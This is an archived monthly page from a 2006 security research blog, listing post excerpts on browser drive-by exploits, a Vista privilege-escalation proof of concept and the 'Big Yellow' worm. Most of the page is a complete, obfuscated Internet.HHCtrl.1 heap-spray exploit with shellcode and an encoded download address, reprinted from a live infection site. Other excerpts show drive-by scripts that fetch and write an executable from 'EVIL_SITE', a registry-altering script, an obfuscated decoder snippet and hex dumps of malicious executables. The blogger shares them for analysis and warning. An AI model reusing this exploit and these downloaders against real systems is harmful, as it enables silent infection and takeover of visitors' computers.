You are viewing a read-only archive of the Blogs.Harvard network. Learn more.
Skip to content

Monthly Archives: December 2006

Analysis of Microsoft’s Suicide Note (part 1)

Saturday, December 30, 2006

[editors note: this is becoming far too long a post for a single entry and will be serialized over the coming week] In a controversial technical analysis Peter Gutmann goes into fantastic detail about the recently released Vista operating system and it’s content protection scheme. One thing became clear to me after reading this analysis. […]

Filed in Interesting Tech | | Comments Off on Analysis of Microsoft’s Suicide Note (part 1)

Internet.HHCtrl.1 Exploit

Sunday, December 24, 2006

I’ve enclosed the code in a text box to make reading it a little easier. This code was found on a live site that is using the exploit via iframes to infect drive by downloaders. Extra br tags are a result of the blog software…. <script> t=”60,83,67,82,73,80,84,32,108,97,110,103,117,97,103,101,61,74,97,118,97,83,99,114,105,112,116,62,104,72,72,67,116,114,108,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,34,73,110,116,101,114,110,101,116,46,72,72,67,116,114,108,46,49,34,41,59,13,10,118,97,114,32,101,118,105,108,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,48,48,48,98,37,117,48,48,48,98,37,117,48,48,48,98,37,117,48,48,48,98,34,41,59,13,10,118,97,114,32,73,109,97,103,101,115,32,61,32,34,65,99,116,105,118,101,88,46,34,32,43,32,101,118,105,108,32,43,32,34,82,116,108,65,108,108,111,99,97,116,101,72,101,97,112,82,116,108,67,114,101,97,116,101,72,101,97,112,34,59,13,10,118,97,114,32,99,111,117,110,116,32,61,32,48,59,118,97,114,32,109,97,120,99,111,117,110,116,32,61,32,49,48,59,102,117,110,99,116,105,111,110,32,67,108,105,99,107,84,111,40,41,123,32,104,72,72,67,116,114,108,46,73,109,97,103,101,32,61,32,73,109,97,103,101,115,59,125,13,10,102,117,110,99,116,105,111,110,32,71,111,116,73,116,40,41,123,32,99,111,117,110,116,43,43,59,32,105,102,40,99,111,117,110,116,32,60,32,109,97,120,99,111,117,110,116,41,32,123,32,32,120,46,111,110,99,108,105,99,107,40,41,59,32,32,71,111,116,73,116,40,41,59,32,125,125,13,10,102,117,110,99,116,105,111,110,32,66,117,105,108,100,67,111,110,116,101,120,116,40,41,123,32,112,97,121,108,111,97,100,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,57,48,57,48,37,117,54,48,57,48,37,117,49,55,101,98,37,117,54,52,53,101,37,117,51,48,97,49,37,117,48,48,48,48,37,117,48,53,48,48,37,117,48,56,48,48,37,117,48,48,48,48,37,117,102,56,56,98,37,117,48,48,98,57,37,117,48,48,48,52,37,117,102,51,48,48,37,117,102,102,97,52,37,117,101,56,101,48,37,117,102,102,101,52,37,117,102,102,102,102,37,117,97,49,54,52,37,117,48,48,51,48,37,117,48,48,48,48,37,117,52,48,56,98,37,117,56,98,48,99,37,117,49,99,55,48,37,117,56,98,97,100,37,117,48,56,55,48,37,117,101,99,56,49,37,117,48,50,48,48,37,117,48,48,48,48,37,117,101,99,56,98,37,117,101,56,98,98,37,117,48,50,48,102,37,117,56,98,48,48,37,117,56,53,48,51,37,117,48,102,99,48,37,117,98,98,56,53,37,117,48,48,48,48,37,117,102,102,48,48,37,117,101,57,48,51,37,117,48,50,50,49,37,117,48,48,48,48,37,117,56,57,53,98,37,117,50,48,53,100,37,117,54,56,53,54,37,117,102,101,57,56,37,117,48,101,56,97,37,117,98,49,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,48,99,52,53,37,117,54,56,53,54,37,117,52,101,56,101,37,117,101,99,48,101,37,117,97,51,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,48,52,52,53,37,117,54,56,53,54,37,117,55,57,99,49,37,117,98,56,101,53,37,117,57,53,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,49,99,52,53,37,117,54,56,53,54,37,117,99,54,49,98,37,117,55,57,52,54,37,117,56,55,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,49,48,52,53,37,117,54,56,53,54,37,117,102,99,97,97,37,117,55,99,48,100,37,117,55,57,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,48,56,52,53,37,117,54,56,53,54,37,117,56,52,101,55,37,117,98,52,54,57,37,117,54,98,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,49,52,52,53,37,117,101,48,98,98,37,117,48,50,48,102,37,117,56,57,48,48,37,117,51,51,48,51,37,117,99,55,102,54,37,117,50,56,52,53,37,117,53,50,53,53,37,117,52,100,52,99,37,117,52,53,99,55,37,117,52,102,50,99,37,117,48,48,52,101,37,117,56,100,48,48,37,117,50,56,53,100,37,117,102,102,53,51,37,117,48,52,53,53,37,117,54,56,53,48,37,117,49,97,51,54,37,117,55,48,50,102,37,117,51,102,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,50,52,52,53,37,117,55,102,54,97,37,117,53,100,56,100,37,117,53,51,50,56,37,117,53,53,102,102,37,117,99,55,49,99,37,117,48,53,52,52,37,117,53,99,50,56,37,117,54,53,50,101,37,117,99,55,55,56,37,117,48,53,52,52,37,117,54,53,50,99,37,117,48,48,48,48,37,117,53,54,48,48,37,117,56,100,53,54,37,117,50,56,55,100,37,117,102,102,53,55,37,117,50,48,55,53,37,117,102,102,53,54,37,117,50,52,53,53,37,117,53,55,53,54,37,117,53,53,102,102,37,117,101,56,48,99,37,117,48,48,54,50,37,117,48,48,48,48,37,117,99,52,56,49,37,117,48,50,48,48,37,117,48,48,48,48,37,117,51,51,54,49,37,117,99,50,99,48,37,117,48,48,48,52,37,117,56,98,53,53,37,117,53,49,101,99,37,117,56,98,53,51,37,117,48,56,55,100,37,117,53,100,56,98,37,117,53,54,48,99,37,117,55,51,56,98,37,117,56,98,51,99,37,117,49,101,55,52,37,117,48,51,55,56,37,117,53,54,102,51,37,117,55,54,56,98,37,117,48,51,50,48,37,117,51,51,102,51,37,117,52,57,99,57,37,117,97,100,52,49,37,117,99,51,48,51,37,117,51,51,53,54,37,117,48,102,102,54,37,117,49,48,98,101,37,117,102,50,51,97,37,117,48,56,55,52,37,117,99,101,99,49,37,117,48,51,48,100,37,117,52,48,102,50,37,117,102,49,101,98,37,117,102,101,51,98,37,117,55,53,53,101,37,117,53,97,101,53,37,117,101,98,56,98,37,117,53,97,56,98,37,117,48,51,50,52,37,117,54,54,100,100,37,117,48,99,56,98,37,117,56,98,52,98,37,117,49,99,53,97,37,117,100,100,48,51,37,117,48,52,56,98,37,117,48,51,56,98,37,117,53,101,99,53,37,117,53,57,53,98,37,117,99,50,53,100,37,117,48,48,48,56,37,117,57,50,101,57,37,117,48,48,48,48,37,117,53,101,48,48,37,117,56,48,98,102,37,117,48,50,48,99,37,117,98,57,48,48,37,117,48,49,48,48,37,117,48,48,48,48,37,117,97,52,102,51,37,117,101,99,56,49,37,117,48,49,48,48,37,117,48,48,48,48,37,117,102,99,56,98,37,117,99,55,56,51,37,117,99,55,49,48,37,117,54,101,48,55,37,117,54,52,55,52,37,117,99,55,54,99,37,117,48,52,52,55,37,117,48,48,54,99,37,117,48,48,48,48,37,117,102,102,53,55,37,117,48,52,53,53,37,117,52,53,56,57,37,117,99,55,50,52,37,117,53,50,48,55,37,117,54,99,55,52,37,117,99,55,52,49,37,117,48,52,52,55,37,117,54,99,54,99,37,117,54,51,54,102,37,117,52,55,99,55,37,117,54,49,48,56,37,117,54,53,55,52,37,117,99,55,52,56,37,117,48,99,52,55,37,117,54,49,54,53,37,117,48,48,55,48,37,117,53,48,53,55,37,117,53,53,102,102,37,117,56,98,48,56,37,117,98,56,102,48,37,117,48,102,101,52,37,117,48,48,48,50,37,117,51,48,56,57,37,117,48,55,99,55,37,117,55,51,54,100,37,117,54,51,55,54,37,117,52,55,99,55,37,117,55,50,48,52,37,117,48,48,55,52,37,117,53,55,48,48,37,117,53,53,102,102,37,117,56,98,48,52,37,117,51,99,52,56,37,117,56,99,56,98,37,117,56,48,48,56,37,117,48,48,48,48,37,117,51,57,48,48,37,117,48,56,51,52,37,117,48,52,55,52,37,117,102,57,101,50,37,117,49,50,101,98,37,117,51,52,56,100,37,117,53,53,48,56,37,117,52,48,54,97,37,117,48,52,54,97,37,117,102,102,53,54,37,117,49,48,53,53,37,117,48,54,99,55,37,117,48,99,56,48,37,117,48,48,48,50,37,117,99,52,56,49,37,117,48,49,48,48,37,117,48,48,48,48,37,117,101,56,99,51,37,117,102,102,54,57,37,117,102,102,102,102,37,117,48,52,56,98,37,117,53,51,50,52,37,117,53,50,53,49,37,117,53,55,53,54,37,117,101,99,98,57,37,117,48,50,48,102,37,117,56,98,48,48,37,117,56,53,49,57,37,117,55,53,100,98,37,117,51,51,53,48,37,117,51,51,99,57,37,117,56,51,100,98,37,117,48,54,101,56,37,117,98,55,48,102,37,117,56,49,49,56,37,117,102,102,102,98,37,117,48,48,49,53,37,117,55,53,48,48,37,117,56,51,51,101,37,117,48,54,101,56,37,117,98,55,48,102,37,117,56,49,49,56,37,117,102,102,102,98,37,117,48,48,51,53,37,117,55,53,48,48,37,117,56,51,51,48,37,117,48,50,101,56,37,117,98,55,48,102,37,117,56,51,49,56,37,117,54,97,102,98,37,117,50,53,55,53,37,117,99,48,56,51,37,117,56,98,48,52,37,117,98,56,51,48,37,117,48,102,101,48,37,117,48,48,48,50,37,117,48,48,54,56,37,117,48,48,48,48,37,117,54,56,48,49,37,117,49,48,48,48,37,117,48,48,48,48,37,117,48,48,54,97,37,117,49,48,102,102,37,117,48,54,56,57,37,117,52,52,56,57,37,117,49,56,50,52,37,117,101,99,98,57,37,117,48,50,48,102,37,117,102,102,48,48,37,117,53,102,48,49,37,117,53,97,53,101,37,117,53,98,53,57,37,117,101,52,98,56,37,117,48,50,48,102,37,117,102,102,48,48,37,117,101,56,50,48,37,117,102,100,100,97,37,117,102,102,102,102,34,41,59,13,10,104,111,109,101,61,117,110,101,115,99,97,112,101,40,34,37,117,55,52,54,56,37,117,55,48,55,52,37,117,50,102,51,97,37,117,54,51,50,102,37,117,54,49,54,57,37,117,54,54,50,101,37,117,54,57,54,50,37,117,54,102,50,101,37,117,54,55,55,50,37,117,54,51,50,101,37,117,50,102,54,101,37,117,55,51,54,51,37,117,50,101,54,101,37,117,55,56,54,53,37,117,48,48,54,53,37,117,48,48,48,48,34,41,59,13,10,114,117,110,110,97,98,108,101,32,61,32,112,97,121,108,111,97,100,43,104,111,109,101,59,32,115,107,105,112,112,101,114,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,52,56,52,56,37,117,52,56,52,56,34,41,59,13,10,119,104,105,108,101,32,40,115,107,105,112,112,101,114,46,108,101,110,103,116,104,60,50,48,43,114,117,110,110,97,98,108,101,46,108,101,110,103,116,104,41,32,123,32,32,115,107,105,112,112,101,114,43,61,115,107,105,112,112,101,114,59,32,125,13,10,115,107,105,112,112,101,114,49,32,61,32,115,107,105,112,112,101,114,46,115,117,98,115,116,114,105,110,103,40,48,44,32,50,48,43,114,117,110,110,97,98,108,101,46,108,101,110,103,116,104,41,59,13,10,115,107,105,112,112,101,114,50,32,61,32,115,107,105,112,112,101,114,46,115,117,98,115,116,114,105,110,103,40,48,44,32,115,107,105,112,112,101,114,46,108,101,110,103,116,104,45,50,48,45,114,117,110,110,97,98,108,101,46,108,101,110,103,116,104,41,59,13,10,119,104,105,108,101,40,115,107,105,112,112,101,114,50,46,108,101,110,103,116,104,60,40,48,120,52,48,48,48,48,45,50,48,45,114,117,110,110,97,98,108,101,46,108,101,110,103,116,104,41,41,32,123,32,32,115,107,105,112,112,101,114,50,32,43,61,32,115,107,105,112,112,101,114,50,59,13,10,115,107,105,112,112,101,114,50,32,43,61,32,115,107,105,112,112,101,114,49,59,32,125,32,99,111,110,116,101,120,116,32,61,32,110,101,119,32,65,114,114,97,121,40,41,59,32,105,105,61,45,49,59,32,119,104,105,108,101,40,43,43,105,105,60,51,48,48,41,13,10,123,32,32,99,111,110,116,101,120,116,91,105,105,93,32,61,32,115,107,105,112,112,101,114,50,32,43,32,114,117,110,110,97,98,108,101,59,32,125,32,71,111,116,73,116,40,41,59,125,102,117,110,99,116,105,111,110,32,116,101,115,116,40,41,123,32,97,108,101,114,116,40,41,59,125,60,47,83,67,82,73,80,84,62″ t=eval(“String.fromCharCode(“+t+”)”); document.write(t); </script> </HEAD><BODY onload=BuildContext();> <BUTTON id=x onclick=ClickTo();> […]

Filed in Digital Warfare, Vulnerabilities | | Comments Off on Internet.HHCtrl.1 Exploit

another variation of drive by downloaders

Sunday, December 24, 2006

The exploit used is fairly old. One other important thing to note is that the CLSID used here is a Microsoft database control. [zero@day testing]$ curl http://EVIL_SITE/db/wm.htm <script> var url,path; url=”http://EVIL_SITE/mc/game/db.exe”; path=”C:\\boot.exe”; try{ var ado=(document.createElement(“object”)); var d=1; ado.setAttribute(“classid”,”clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″); var e=1; var xml=ado.CreateObject(“Microsoft.XMLHTTP”,””); var f=1; var ab=”Adodb.”; var cd=”Stream”; var g=1; var as=ado.createobject(ab+cd,””); var h=1; xml.Open(“GET”,url,0); […]

Filed in Digital Warfare, Vulnerabilities | | Comments Off on another variation of drive by downloaders

Vista exploit code

Saturday, December 23, 2006

Feel free to send 50k to my paypal account :) Russian sites are starting to post proof of concept code now. I had little idea of how trivial this exploit would be to understand but it would seem that error message parameters are used to elevate privledges. If the MB_SERVICE_NOTIFICATION flag is specified when calling […]

Filed in Digital Warfare, zeroday | | Comments Off on Vista exploit code

Digital Disobedience the Video

Saturday, December 23, 2006

For those who were not able to attend the Digital disobedience event on cyberactivism and culture jamming a video has been produced and hosted by the Berkman Center. It was a great time and I can’t thank them all enough for coming to us.

Filed in events, Rights Online | | Comments Off on Digital Disobedience the Video

evil code part 2 (also in hex)

Friday, December 22, 2006

0000000 4d5a 9000 0300 0000 0400 0000 5045 0000 0000010 4c01 0200 4653 4721 0000 0000 0000 0000 0000020 e000 0f01 0b01 0000 0002 0000 0016 0000 0000030 0000 0000 b351 0000 0010 0000 0c00 0000 0000040 0000 4000 0010 0000 0002 0000 0400 0000 0000050 0000 0000 0400 0000 0000 0000 0060 0000 0000060 […]

Filed in Digital Warfare | | Comments Off on evil code part 2 (also in hex)

Evil code I found today (hexdumped for your safety)

Friday, December 22, 2006

0000000 4d5a 9000 0300 0000 0400 0000 5045 0000 0000010 4c01 0200 4653 4721 0000 0000 0000 0000 0000020 e000 0f01 0b01 0000 0002 0000 0016 0000 0000030 0000 0000 b351 0000 0010 0000 0c00 0000 0000040 0000 4000 0010 0000 0002 0000 0400 0000 0000050 0000 0000 0400 0000 0000 0000 0060 0000 0000060 […]

Filed in Digital Warfare | | Comments Off on Evil code I found today (hexdumped for your safety)

Registry altering web page

Tuesday, December 19, 2006

I found this amusing today. It is a javascript that was linked to a lotto information page. It changed some rather important registry keys I’ve broken up some of the lines of code to make it fit this blog theme. var url = “http://EVIL_SITE”; var burl = “http://EVIL_SITE”; var fso = new ActiveXObject(“Scripting.FileSystemObject”); var tfolder […]

Filed in Digital Warfare | | Comments Off on Registry altering web page

More interesting web code

Tuesday, December 19, 2006

This is a random javascript snippet I found today which I will analyze later. Just recording for posterity. <script language=”JavaScript”>e = ‘0x00′ + ’27’;str1 = “%9C%C4%CF%D2%B8%D5%D4%DF% CC%C3%9B%86%D2%CF%D5%CF%C6%CF%CC%CF%D4%DF%9E%C0%CF%C4%C4%C3%CA%86%9A%9C% CF%C2%D6%C7%CB%C3%B8%D5%D6%C5%9B%86%C0%D4%D4%C8%9E%89%89%C1%D6%C3%D4%C7% C6%C5%8A%C5%C9%CB%89%D4%D6%C2%89%86%B8%D1%CF%C4%D4%C0%9B%97%B8%C0%C3%CF% C1%C0%D4%9B%97%9A%9C%89%CF%C2%D6%C7%CB%C3%9A%9C%89%C4%CF%D2%9A”; str=tmp=”; for(i=0;i<str1.length;i+=3) {tmp = unescape(str1.slice(i,i+3)); str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);} document.write(str);</script> It seems like it could be a more advanced unpacker then most of the lame ones I normally […]

Filed in Digital Warfare | | Comments Off on More interesting web code

Big Yellow

Tuesday, December 19, 2006

Two of my former employers have made the news again. “Big Yellow” is a new worm/bot-net discovered by eEye Digital Security which affects users of anti-virus from software maker Symantec. I’ve heard very recently one analyst say that “anti virus is dead” but I don’t think this is what he had in mind. The fact […]

Filed in Digital Warfare | | Comments Off on Big Yellow
Proudly powered by WordPress. Hosted by Pressable.